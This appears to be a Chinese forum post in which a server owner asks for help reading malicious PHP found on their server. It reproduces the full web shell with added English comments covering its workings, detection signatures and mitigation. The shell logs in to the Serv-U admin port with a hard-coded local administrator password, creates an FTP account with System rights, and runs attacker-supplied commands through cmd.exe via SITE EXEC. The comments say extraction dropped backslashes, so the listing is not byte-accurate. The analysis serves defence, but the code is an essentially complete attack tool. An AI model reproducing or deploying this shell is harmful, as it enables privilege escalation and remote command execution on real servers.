概述
解读 PHP恶意代码
我的服务器被人上传了恶意代码，我看了但看不懂，有谁可以帮我分析一下？
//
//Codez begin
//
// Undo magic_quotes_gpc escaping so the attacker's query-string values reach
// the Serv-U commands below unmodified. get_magic_quotes_gpc() was removed in
// PHP 8 (and has returned false since 5.4), which dates this sample to old
// PHP 5 hosts. stripslashes_array() is defined at the bottom of this file.
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
}
// Built-in defaults. 43958 is the port up() dials for the Serv-U admin
// session, and the $adminuser/$adminpass pair below is what it sends there:
// the local administration account that older Serv-U versions exposed on this
// port, which is the weakness the whole script depends on. The new FTP
// account defaults to suber/1234567890 with the drive root as its home.
// Detection: these literal strings are a convenient signature for this family
// of Serv-U "add user, then SITE EXEC" shells.
// Note: 'C:\' as written does not parse (\' is an escaped quote inside a
// single-quoted string); the page's extraction has dropped backslashes from
// escape sequences throughout, so this listing is not a byte-accurate copy of
// the sample and should not be hashed as an IoC.
$addr = '0.0.0.0';
$ftpport = 21;
$adminport = 43958;
$adminuser = 'LocalAdministrator';
$adminpass = '#l@$ak#.lk;0@P';
$user = 'suber';
$password = '1234567890';
$homedir = 'C:\';
$dir = 'C:\WINNT\System32\';
// Any non-empty query string overrides every default with no validation at
// all; only 'dir' is guarded by a truthiness check. A request that sets just
// 'action' therefore nulls out the other fields (undefined-index notices,
// then empty values in the FTP commands).
if ($_GET){
$addr = $_GET['addr'] ;
$ftpport = $_GET['ftpport'] ;
$adminport = $_GET['adminport'] ;
$adminuser = $_GET['adminuser'] ;
$adminpass = $_GET['adminpass'] ;
$user = $_GET['user'] ;
$password = $_GET['password'] ;
$homedir = $_GET['homedir'] ;
if ($_GET['dir']){
$dir = $_GET['dir'] ;
}
}
?>
SUU1.5b {font-family : Verdana, sans-serif;font-size : 14px;}
body,td,p,pre {
font-family : Verdana, sans-serif;font-size : 12px;
}
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
添加Serv-U用户部分
主机IP: | |
主机Ftp端口: | |
主机Ftp管理端口: | |
主机Ftp管理用户: | |
主机Ftp管理密码: | |
添加的用户名: | |
添加的用户名密码: | |
用户主目录(别忘了写""): | |
命令回显:
// Dispatcher for the "add user" form above: action=up runs stage 1 with the
// values collected at the top of the file. Loose == and an unchecked
// $_GET['action'] index (notice when absent) are typical of this era of code.
if ($_GET['action']=="up"){
up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);
}
?>
主机Ftp端口: | |
用户名: | |
用户名密码: | |
系统路径(别忘了写""): | |
执行的命令: | |
命令回显:
// Dispatcher for the "execute command" form: action=execute runs stage 2 with
// the raw, unvalidated $_GET['cmd']. This is the line that turns the page into
// a command shell; requests to this file carrying action=execute together
// with cmd= are the thing to alert on in web-server logs.
if ($_GET['action']=="execute"){
ftpcmd($ftpport,$user,$password,$dir,$_GET['cmd']);
}
?>
// Stage 1 of the shell: creates a Serv-U FTP account through the server's
// administrative interface. Every argument is attacker-controlled via $_GET
// (see the top of the file). Whatever the server replies is echoed straight
// into the HTTP response, unescaped.
// Detection: a web-server worker opening a TCP connection to 127.0.0.1 on the
// Serv-U admin port (43958 by default here) and sending "SITE MAINTENANCE" /
// "-SETUSERSETUP" is a high-signal indicator, as is the literal admin
// username/password at the top of this file. Mitigation is on the Serv-U
// side (a version without the hard-coded local admin account) plus keeping
// the web server from talking to the admin listener.
// Note: the "rn" ending each string literal is a CRLF escape whose backslashes
// were lost in extraction, so this listing is not byte-accurate.
function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){
// Always loopback: the script assumes Serv-U runs on the same host as the
// web server. 8-second connect timeout; on failure only the error is echoed.
$fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8);
if (!$fp) {
echo "$errstr ($errno)
n";
} else {
// Authenticate as the administrator account. Replies are never read; the
// sleeps are the only pacing.
fputs ($fp, "USER ".$adminuser."rn");
sleep (1);
fputs ($fp, "PASS ".$adminpass."rn");
sleep (1);
// Enter maintenance mode and push a complete user record: address/port
// binding, credentials, home directory, then a block of account flags.
fputs ($fp, "SITE MAINTENANCErn");
sleep (1);
fputs ($fp, "-SETUSERSETUPrn");
fputs ($fp, "-IP=".$addr."rn");
fputs ($fp, "-PortNo=".$ftpport."rn");
fputs ($fp, "-User=".$user."rn");
fputs ($fp, "-Password=".$password."rn");
fputs ($fp, "-HomeDir=".$homedir."rn");
fputs ($fp, "-LoginMesFile=rn");
fputs ($fp, "-Disable=0rn");
fputs ($fp, "-RelPaths=0rn");
fputs ($fp, "-NeedSecure=0rn");
fputs ($fp, "-HideHidden=0rn");
fputs ($fp, "-AlwaysAllowLogin=0rn");
fputs ($fp, "-ChangePassword=1rn");
fputs ($fp, "-QuotaEnable=0rn");
fputs ($fp, "-MaxUsersLoginPerIP=-1rn");
fputs ($fp, "-SpeedLimitUp=-1rn");
fputs ($fp, "-SpeedLimitDown=-1rn");
fputs ($fp, "-MaxNrUsers=-1rn");
fputs ($fp, "-IdleTimeOut=600rn");
fputs ($fp, "-SessionTimeOut=-1rn");
fputs ($fp, "-Expire=0rn");
fputs ($fp, "-RatioUp=1rn");
fputs ($fp, "-RatioDown=1rn");
fputs ($fp, "-RatiosCredit=0rn");
fputs ($fp, "-QuotaCurrent=0rn");
fputs ($fp, "-QuotaMaximum=0rn");
// Maintenance=System is the privilege level given to the new account;
// presumably this is what later allows ftpcmd()'s SITE EXEC — verify
// against the Serv-U version involved.
fputs ($fp, "-Maintenance=Systemrn");
fputs ($fp, "-PasswordType=Regularrn");
fputs ($fp, "-Ratios=Nonern");
// Permission string for the home directory; the meaning of the individual
// letters is Serv-U's and not established by this file.
fputs ($fp, " Access=".$homedir."|RWAMELCDPrn");
fputs ($fp, "QUITrn");
sleep (1);
// Dump the server's output into the page. $fp is never fclose()d here,
// unlike the socket in ftpcmd().
while (!feof($fp)) {
echo fgets ($fp,128);
}
}
}
// Stage 2 of the shell: logs in over plain FTP as the account created by up()
// and uses SITE EXEC to run cmd.exe from $dir with the attacker's command.
// $cmd arrives straight from $_GET['cmd'] with no validation.
// Detection: "SITE EXEC" in Serv-U logs, and cmd.exe appearing as a child of
// the Serv-U service process rather than of the web server; the web worker's
// loopback connection to the FTP port is the other side of the same event.
// Note: as in up(), the "rn" suffixes are CRLF escapes with the backslashes
// lost in extraction.
function ftpcmd($ftpport,$user,$password,$dir,$cmd){
// Loopback FTP connection, 8-second connect timeout; only the error is
// echoed on failure.
$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8);
if (!$conn_id) {
echo "$errstr ($errno)
n";
} else {
// Plain USER/PASS login; replies are never read, the sleeps pace the session.
fputs ($conn_id, "USER ".$user."rn");
sleep (1);
fputs ($conn_id, "PASS ".$password."rn");
sleep (1);
// $dir is concatenated with no separator, so it must end in a path
// separator (the default at the top of the file does).
fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."rn");
fputs ($conn_id, "QUITrn");
sleep (1);
// Echo whatever the server replies, then close the socket.
while (!feof($conn_id)) {
echo fgets ($conn_id,128);
}
fclose($conn_id);
}
}
// Recursively strips magic_quotes backslashes from a request array so the
// attacker's values (passwords, Windows paths) arrive unmodified.
// Skips 'argc'/'argv' and any all-uppercase, non-numeric key — presumably to
// leave environment-style entries alone; the intent is not stated here.
// Uses each(), deprecated in PHP 7.2 and removed in PHP 8, so this code does
// not run on current PHP at all.
function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
// A key is processed when it is not all-uppercase, or when it is numeric
// (''.intval($key) == "$key" is a loose "integer string" test). Because the
// comparisons are loose, an integer key 0 compares equal to 'argc' on PHP 7
// and earlier and is skipped — a latent quirk rather than a feature.
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
// Nested arrays are handled recursively; $var is a copy, so the return
// value is what actually updates the outer array.
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
// Modified in place through the reference and also returned; the caller at
// the top of the file uses the return value.
return $array;
}
?>